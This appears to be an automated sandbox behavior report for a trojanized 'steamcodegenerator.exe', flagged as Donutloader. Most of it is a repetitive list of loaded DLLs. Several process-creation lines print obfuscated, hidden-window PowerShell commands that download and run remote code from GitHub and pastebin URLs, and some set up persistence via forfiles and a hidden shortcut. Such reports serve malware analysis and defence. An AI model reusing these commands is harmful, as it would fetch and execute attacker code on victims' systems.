Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stm[1].txt, type: DROPPED | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine | Classification label: mal96.troj.evad.winEXE@21/17@5/4
Source: C:\Users\user\Desktop\steamcodegenerator.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stm[1].txt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yf2k4eim.g1l.ps1
Source: steamcodegenerator.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: steamcodegenerator.exe | ReversingLabs: Detection: 42%
Source: unknown | Process created: C:\Users\user\Desktop\steamcodegenerator.exe "C:\Users\user\Desktop\steamcodegenerator.exe"
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Desktop\steamcodegenerator.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
